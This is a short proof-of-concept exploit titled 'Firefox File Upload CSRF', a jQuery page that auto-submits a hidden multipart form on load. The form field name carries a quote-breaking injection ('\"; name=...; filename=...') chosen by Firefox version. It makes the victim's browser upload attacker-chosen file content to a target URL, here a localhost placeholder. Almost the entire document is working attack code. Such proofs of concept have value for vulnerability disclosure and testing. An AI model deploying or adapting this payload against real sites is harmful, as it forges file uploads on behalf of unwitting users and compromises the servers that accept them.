Firefox File Upload CSRF

csrf_upload.js

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
<script>
$(document).ready(function() {
  var request = {
    "url": "http://localhost:4567/test",
    "file_name": "uptest.foo",
    "param_name": "file",
    "file_content": "blah content" 
  }

  if(jQuery.browser.version[0] == '2') {
    var injection = '\\"; name=' + request['param_name'] + '; filename=' + request['file_name'] + ';';
  } else {
    var injection = request['param_name'] + '"; filename="' + request['file_name'];
  }

	$("<form>")
		.attr("method", "POST")
		.attr("enctype", "multipart/form-data")
		.attr("action", request['url'])
		.appendTo("body");
	$("<input>")
		.attr("type", "hidden")
		.attr("name", injection)
		.attr("value", request['file_content'])
		.appendTo("form");
	$("form").submit();
});
</script>